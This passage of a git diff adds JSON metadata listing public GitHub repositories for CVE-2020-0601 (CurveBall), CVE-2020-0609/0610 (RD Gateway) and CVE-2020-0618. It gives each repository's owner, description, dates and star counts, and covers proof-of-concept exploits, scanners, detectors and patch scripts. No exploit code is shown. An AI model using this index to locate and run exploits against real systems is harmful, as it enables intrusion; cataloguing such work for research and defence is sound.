"html_url": "https:\/\/github.com\/saleemrashid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saleemrashid\/badecparams", + "description": "Proof of Concept for CVE-2020-0601", + "fork": false, + "created_at": "2020-01-16T23:44:37Z", + "updated_at": "2024-08-12T19:56:43Z", + "pushed_at": "2024-03-22T16:56:58Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 64, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 234442281, + "name": "cve-2020-0601-utils", + "full_name": "0xxon\/cve-2020-0601-utils", + "owner": { + "login": "0xxon", + "id": 1538460, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1538460?v=4", + "html_url": "https:\/\/github.com\/0xxon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xxon\/cve-2020-0601-utils", + "description": "C++ based utility to check if certificates are trying to exploit CVE-2020-0601", + "fork": false, + "created_at": "2020-01-17T01:02:52Z", + "updated_at": "2024-08-12T19:56:43Z", + "pushed_at": "2020-01-21T19:48:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 234574037, + "name": "Windows10_Cumulative_Updates_PowerShell", + "full_name": "Doug-Moody\/Windows10_Cumulative_Updates_PowerShell", + "owner": { + "login": "Doug-Moody", + "id": 40870695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40870695?v=4", + "html_url": "https:\/\/github.com\/Doug-Moody", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Doug-Moody\/Windows10_Cumulative_Updates_PowerShell", + "description": "Powershell to patch CVE-2020-0601 . Complete security rollup for Windows 10 1507-1909", + "fork": false, + "created_at": "2020-01-17T15:13:37Z", + "updated_at": "2024-08-12T19:56:44Z", + "pushed_at": "2020-04-08T21:10:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 234588471, + "name": "CVE-2020-0601", + "full_name": "MarkusZehnle\/CVE-2020-0601", + "owner": { + "login": "MarkusZehnle", + "id": 60010315, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60010315?v=4", + "html_url": "https:\/\/github.com\/MarkusZehnle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarkusZehnle\/CVE-2020-0601", + "description": null, + "fork": false, + "created_at": "2020-01-17T16:24:31Z", + "updated_at": "2024-08-12T19:56:44Z", + "pushed_at": "2020-01-17T16:42:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 234598729, + "name": "CVE-2020-0601", + "full_name": "YoannDqr\/CVE-2020-0601", + "owner": { + "login": "YoannDqr", + "id": 26006989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26006989?v=4", + "html_url": "https:\/\/github.com\/YoannDqr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YoannDqr\/CVE-2020-0601", + "description": "CurveBall CVE exploitation", + "fork": false, + "created_at": "2020-01-17T17:17:55Z", + "updated_at": "2024-08-12T19:56:44Z", + "pushed_at": "2020-01-20T10:52:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 234714299, + "name": "cve-2020-0601-Perl", + "full_name": "thimelp\/cve-2020-0601-Perl", + "owner": { + "login": "thimelp", + "id": 60032194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60032194?v=4", + "html_url": "https:\/\/github.com\/thimelp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thimelp\/cve-2020-0601-Perl", + "description": "Perl version of recently published scripts to build ECC certificates with specific parameters re CVE-2020-0601", + "fork": false, + "created_at": "2020-01-18T09:58:16Z", + "updated_at": "2024-08-12T19:56:45Z", + "pushed_at": "2020-01-18T12:07:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 234920281, + "name": "curveball_lua", + "full_name": "dlee35\/curveball_lua", + "owner": { + "login": "dlee35", + "id": 7849311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7849311?v=4", + "html_url": "https:\/\/github.com\/dlee35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dlee35\/curveball_lua", + "description": "Repo containing lua scripts and PCAP to find CVE-2020-0601 exploit attempts via network traffic", + "fork": false, + "created_at": "2020-01-19T15:20:19Z", + "updated_at": "2024-08-12T19:56:48Z", + "pushed_at": "2020-01-19T21:25:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 234944443, + "name": "-CVE-2020-0601-ECC---EXPLOIT", + "full_name": "IIICTECH\/-CVE-2020-0601-ECC---EXPLOIT", + "owner": { + "login": "IIICTECH", + "id": 5104528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5104528?v=4", + "html_url": "https:\/\/github.com\/IIICTECH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IIICTECH\/-CVE-2020-0601-ECC---EXPLOIT", + "description": "CurveBall (CVE-2020-0601) - PoC CVE-2020-0601, or commonly referred to as CurveBall, is a vulnerability in which the signature of certificates using elliptic curve cryptography (ECC) is not correctly verified. Attackers can supply hand-rolled generators, bypassing validation, antivirus & all non-protections. ", + "fork": false, + "created_at": "2020-01-19T18:20:26Z", + "updated_at": "2024-08-12T19:56:49Z", + "pushed_at": "2020-01-19T18:26:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 235000073, + "name": "CVE-2020-0601", + "full_name": "Ash112121\/CVE-2020-0601", + "owner": { + "login": "Ash112121", + "id": 50549802, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50549802?v=4", + "html_url": "https:\/\/github.com\/Ash112121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ash112121\/CVE-2020-0601", + "description": null, + "fork": false, + "created_at": "2020-01-20T02:04:05Z", + "updated_at": "2024-08-12T19:56:49Z", + "pushed_at": "2020-01-20T02:05:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 235145190, + "name": "curveball", + "full_name": "gentilkiwi\/curveball", + "owner": { + "login": "gentilkiwi", + "id": 2307945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2307945?v=4", + "html_url": "https:\/\/github.com\/gentilkiwi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gentilkiwi\/curveball", + "description": "CVE-2020-0601 #curveball - Alternative Key Calculator", + "fork": false, + "created_at": "2020-01-20T16:24:20Z", + "updated_at": "2024-10-22T13:44:21Z", + "pushed_at": "2020-01-20T23:00:14Z", + "stargazers_count": 76, + "watchers_count": 76, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 76, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 235858699, + "name": "CurveBall", + "full_name": "Hans-MartinHannibalLauridsen\/CurveBall", + "owner": { + "login": "Hans-MartinHannibalLauridsen", + "id": 19854797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19854797?v=4", + "html_url": "https:\/\/github.com\/Hans-MartinHannibalLauridsen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hans-MartinHannibalLauridsen\/CurveBall", + "description": "CVE-2020-0601: Windows CryptoAPI Vulnerability. (CurveBall\/ChainOfFools)", + "fork": false, + "created_at": "2020-01-23T18:26:48Z", + "updated_at": "2024-08-12T19:56:56Z", + "pushed_at": "2023-05-30T20:05:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 236119532, + "name": "PoC_CurveBall", + "full_name": "apodlosky\/PoC_CurveBall", + "owner": { + "login": "apodlosky", + "id": 36350051, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36350051?v=4", + "html_url": "https:\/\/github.com\/apodlosky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apodlosky\/PoC_CurveBall", + "description": "PoC for \"CurveBall\" CVE-2020-0601", + "fork": false, + "created_at": "2020-01-25T03:11:36Z", + "updated_at": "2024-08-12T19:56:59Z", + "pushed_at": "2020-02-19T04:00:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 236845131, + "name": "Curveball", + "full_name": "ioncodes\/Curveball", + "owner": { + "login": "ioncodes", + "id": 18533297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18533297?v=4", + "html_url": "https:\/\/github.com\/ioncodes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ioncodes\/Curveball", + "description": "PoC for CVE-2020-0601 - CryptoAPI exploit", + "fork": false, + "created_at": "2020-01-28T21:24:54Z", + "updated_at": "2024-08-12T19:57:06Z", + "pushed_at": "2022-03-06T10:53:31Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 21, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 236884560, + "name": "gringotts", + "full_name": "amlweems\/gringotts", + "owner": { + "login": "amlweems", + "id": 117625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117625?v=4", + "html_url": "https:\/\/github.com\/amlweems", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amlweems\/gringotts", + "description": "proof of concept for CVE-2020-0601", + "fork": false, + "created_at": "2020-01-29T01:59:43Z", + "updated_at": "2024-08-12T19:57:06Z", + "pushed_at": "2020-01-30T20:16:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 237977846, + "name": "CVE-2020-0601", + "full_name": "yanghaoi\/CVE-2020-0601", + "owner": { + "login": "yanghaoi", + "id": 21354684, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21354684?v=4", + "html_url": "https:\/\/github.com\/yanghaoi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanghaoi\/CVE-2020-0601", + "description": "PoC for CVE-2020-0601- Windows CryptoAPI (Crypt32.dll) POC: https:\/\/github.com\/ollypwn\/CurveBall", + "fork": false, + "created_at": "2020-02-03T13:58:07Z", + "updated_at": "2024-08-12T19:57:19Z", + "pushed_at": "2021-04-08T16:53:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 237996900, + "name": "CurveBallDetection", + "full_name": "talbeerysec\/CurveBallDetection", + "owner": { + "login": "talbeerysec", + "id": 25826743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25826743?v=4", + "html_url": "https:\/\/github.com\/talbeerysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/talbeerysec\/CurveBallDetection", + "description": "Resources related to CurveBall (CVE-2020-0601) detection", + "fork": false, + "created_at": "2020-02-03T15:25:54Z", + "updated_at": "2024-08-12T19:57:19Z", + "pushed_at": "2021-12-19T16:34:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 238791221, + "name": "CurveballCertTool", + "full_name": "david4599\/CurveballCertTool", + "owner": { + "login": "david4599", + "id": 29437084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29437084?v=4", + "html_url": "https:\/\/github.com\/david4599", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/david4599\/CurveballCertTool", + "description": "PoC for CVE-2020-0601 vulnerability (Code Signing)", + "fork": false, + "created_at": "2020-02-06T21:46:31Z", + "updated_at": "2024-08-12T19:57:26Z", + "pushed_at": "2020-02-06T22:04:17Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 241135389, + "name": "CVE-2020-0601-EXP", + "full_name": "eastmountyxz\/CVE-2020-0601-EXP", + "owner": { + "login": "eastmountyxz", + "id": 53172375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53172375?v=4", + "html_url": "https:\/\/github.com\/eastmountyxz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eastmountyxz\/CVE-2020-0601-EXP", + "description": "这资源是作者复现微软签字证书漏洞CVE-2020-0601,结合相关资源及文章实现。推荐大家结合作者博客,理解ECC算法、Windows验证机制,并尝试自己复现可执行文件签名证书和HTTPS劫持的例子。作为网络安全初学者,自己确实很菜,但希望坚持下去,加油!", + "fork": false, + "created_at": "2020-02-17T15:01:54Z", + "updated_at": "2024-08-13T01:16:17Z", + "pushed_at": "2020-02-17T16:09:40Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 241136874, + "name": "CVE-2018-20250-WinRAR", + "full_name": "eastmountyxz\/CVE-2018-20250-WinRAR", + "owner": { + "login": "eastmountyxz", + "id": 53172375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53172375?v=4", + "html_url": "https:\/\/github.com\/eastmountyxz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eastmountyxz\/CVE-2018-20250-WinRAR", + "description": "这资源是作者复现微软签字证书漏洞CVE-2020-0601,结合相关资源及文章实现。推荐大家结合作者博客,复现了该漏洞和理解恶意软件自启动劫持原理。作为网络安全初学者,自己确实很菜,但希望坚持下去,一起加油!", + "fork": false, + "created_at": "2020-02-17T15:08:22Z", + "updated_at": "2024-08-12T19:57:49Z", + "pushed_at": "2020-05-19T07:55:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 241412565, + "name": "cve-2020-0601_poc", + "full_name": "gremwell\/cve-2020-0601_poc", + "owner": { + "login": "gremwell", + "id": 633734, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/633734?v=4", + "html_url": "https:\/\/github.com\/gremwell", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gremwell\/cve-2020-0601_poc", + "description": "CVE-2020-0601 proof of concept", + "fork": false, + "created_at": "2020-02-18T16:36:49Z", + "updated_at": "2024-08-12T19:57:52Z", + "pushed_at": "2020-02-19T08:46:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cryptopp", + "cve-2020-0601", + "poc", + "security", + "ssl", + "tls" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 243353551, + "name": "meetup-2-curveball", + "full_name": "bsides-rijeka\/meetup-2-curveball", + "owner": { + "login": "bsides-rijeka", + "id": 61519397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61519397?v=4", + "html_url": "https:\/\/github.com\/bsides-rijeka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bsides-rijeka\/meetup-2-curveball", + "description": "Materials for the second Rijeka secuity meetup. We will be discussing Microsoft cryptoapi vulnerability dubbed CurveBall (CVE-2020-0601)", + "fork": false, + "created_at": "2020-02-26T19:59:25Z", + "updated_at": "2024-08-12T19:58:09Z", + "pushed_at": "2020-09-11T10:29:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 244585713, + "name": "CVE-2020-0601-spoofkey", + "full_name": "exploitblizzard\/CVE-2020-0601-spoofkey", + "owner": { + "login": "exploitblizzard", + "id": 61627070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61627070?v=4", + "html_url": "https:\/\/github.com\/exploitblizzard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitblizzard\/CVE-2020-0601-spoofkey", + "description": null, + "fork": false, + "created_at": "2020-03-03T08:49:47Z", + "updated_at": "2024-08-12T19:58:20Z", + "pushed_at": "2021-03-14T14:20:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 246794448, + "name": "twoplustwo", + "full_name": "ShayNehmad\/twoplustwo", + "owner": { + "login": "ShayNehmad", + "id": 48879847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48879847?v=4", + "html_url": "https:\/\/github.com\/ShayNehmad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShayNehmad\/twoplustwo", + "description": "Implementing CVE-2020-0601", + "fork": false, + "created_at": "2020-03-12T09:30:19Z", + "updated_at": "2024-08-12T19:58:40Z", + "pushed_at": "2020-03-12T09:58:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 330379563, + "name": "CurveBall-CVE-2020-0601-PoC", + "full_name": "okanulkr\/CurveBall-CVE-2020-0601-PoC", + "owner": { + "login": "okanulkr", + "id": 31420008, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31420008?v=4", + "html_url": "https:\/\/github.com\/okanulkr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/okanulkr\/CurveBall-CVE-2020-0601-PoC", + "description": null, + "fork": false, + "created_at": "2021-01-17T11:53:28Z", + "updated_at": "2021-03-27T13:34:17Z", + "pushed_at": "2021-03-27T13:34:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637384455, + "name": "-Awesome-CVE-2020-0601-", + "full_name": "cimashiro\/-Awesome-CVE-2020-0601-", + "owner": { + "login": "cimashiro", + "id": 106910170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106910170?v=4", + "html_url": "https:\/\/github.com\/cimashiro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cimashiro\/-Awesome-CVE-2020-0601-", + "description": "2017-0021", + "fork": false, + "created_at": "2023-05-07T11:54:15Z", + "updated_at": "2024-06-03T14:08:32Z", + "pushed_at": "2023-05-07T11:54:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689301182, + "name": "curveball-plus", + "full_name": "tyj956413282\/curveball-plus", + "owner": { + "login": "tyj956413282", + "id": 12757233, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12757233?v=4", + "html_url": "https:\/\/github.com\/tyj956413282", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tyj956413282\/curveball-plus", + "description": "simulation experiment of Curveball (CVE-2020-0601) attacks under ECQV implicit certificates with Windows-like verifiers", + "fork": false, + "created_at": "2023-09-09T11:38:11Z", + "updated_at": "2023-09-26T02:05:17Z", + "pushed_at": "2023-09-26T02:05:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801539871, + "name": "CVE-2020-0601_PoC", + "full_name": "JoelBts\/CVE-2020-0601_PoC", + "owner": { + "login": "JoelBts", + "id": 170004644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170004644?v=4", + "html_url": "https:\/\/github.com\/JoelBts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JoelBts\/CVE-2020-0601_PoC", + "description": "Demonstration of CVE-2020-0601 aka curveball. Based on the PoC's available at https:\/\/github.com\/kudelskisecurity\/chainoffools and https:\/\/github.com\/ly4k\/CurveBall", + "fork": false, + "created_at": "2024-05-16T12:32:44Z", + "updated_at": "2024-05-16T12:53:55Z", + "pushed_at": "2024-05-16T12:53:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0609.json b/2020/CVE-2020-0609.json new file mode 100644 index 0000000000..f9b5e93c84 --- /dev/null +++ b/2020/CVE-2020-0609.json @@ -0,0 +1,160 @@ +[ + { + "id": 235446025, + "name": "rdg_scanner_cve-2020-0609", + "full_name": "ruppde\/rdg_scanner_cve-2020-0609", + "owner": { + "login": "ruppde", + "id": 46819580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46819580?v=4", + "html_url": "https:\/\/github.com\/ruppde", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ruppde\/rdg_scanner_cve-2020-0609", + "description": "Scanning for Remote Desktop Gateways (Potentially unpatched CVE-2020-0609 and CVE-2020-0610)", + "fork": false, + "created_at": "2020-01-21T21:33:17Z", + "updated_at": "2024-08-12T19:56:53Z", + "pushed_at": "2020-07-05T17:27:24Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 40, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 235899471, + "name": "BlueGate", + "full_name": "ly4k\/BlueGate", + "owner": { + "login": "ly4k", + "id": 53348818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4", + "html_url": "https:\/\/github.com\/ly4k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly4k\/BlueGate", + "description": "PoC (DoS + scanner) for CVE-2020-0609 & CVE-2020-0610 - RD Gateway RCE", + "fork": false, + "created_at": "2020-01-23T22:29:46Z", + "updated_at": "2024-10-14T17:46:04Z", + "pushed_at": "2020-01-24T15:21:06Z", + "stargazers_count": 251, + "watchers_count": 251, + "has_discussions": false, + "forks_count": 77, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-0609", + "cve-2020-0610" + ], + "visibility": "public", + "forks": 77, + "watchers": 251, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 235935839, + "name": "RDGScanner", + "full_name": "MalwareTech\/RDGScanner", + "owner": { + "login": "MalwareTech", + "id": 7256561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7256561?v=4", + "html_url": "https:\/\/github.com\/MalwareTech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MalwareTech\/RDGScanner", + "description": "A proof-of-concept scanner to check an RDG Gateway Server for vulnerabilities CVE-2020-0609 & CVE-2020-0610.", + "fork": false, + "created_at": "2020-01-24T03:52:49Z", + "updated_at": "2024-08-15T09:14:35Z", + "pushed_at": "2020-01-26T21:04:27Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 69, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 236030102, + "name": "CVE-2020-0609", + "full_name": "Archi73ct\/CVE-2020-0609", + "owner": { + "login": "Archi73ct", + "id": 6298298, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6298298?v=4", + "html_url": "https:\/\/github.com\/Archi73ct", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Archi73ct\/CVE-2020-0609", + "description": null, + "fork": false, + "created_at": "2020-01-24T15:39:39Z", + "updated_at": "2024-08-12T19:56:58Z", + "pushed_at": "2020-01-28T12:36:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 236072228, + "name": "BlueGate", + "full_name": "ioncodes\/BlueGate", + "owner": { + "login": "ioncodes", + "id": 18533297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18533297?v=4", + "html_url": "https:\/\/github.com\/ioncodes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ioncodes\/BlueGate", + "description": "PoC for the Remote Desktop Gateway vulnerability - CVE-2020-0609 & CVE-2020-0610", + "fork": false, + "created_at": "2020-01-24T19:47:45Z", + "updated_at": "2024-08-12T19:56:58Z", + "pushed_at": "2020-01-31T13:49:06Z", + "stargazers_count": 77, + "watchers_count": 77, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 77, + "score": 0, + "subscribers_count": 13 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0618.json b/2020/CVE-2020-0618.json new file mode 100644 index 0000000000..c0b5a81f8b --- /dev/null +++ b/2020/CVE-2020-0618.json @@ -0,0 +1,95 @@ +[ + { + "id": 240657889, + "name": "CVE-2020-0618", + "full_name": "euphrat1ca\/CVE-2020-0618", + "owner": { + "login": "euphrat1ca", + "id": 23180818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23180818?v=4", + "html_url": "https:\/\/github.com\/euphrat1ca", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/euphrat1ca\/CVE-2020-0618", + "description": "SQL Server Reporting Services(CVE-2020-0618)中的RCE", + "fork": false, + "created_at": "2020-02-15T06:40:23Z", + "updated_at": "2024-08-12T19:57:45Z", + "pushed_at": "2020-02-15T06:41:54Z", + "stargazers_count": 198, + "watchers_count": 198, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 39, + "watchers": 198, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 241408033, + "name": "cve-2020-0618", + "full_name": "wortell\/cve-2020-0618", + "owner": { + "login": "wortell", + "id": 54625905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54625905?v=4", + "html_url": "https:\/\/github.com\/wortell", + "user_view_type": "public" + }, + "html_url": 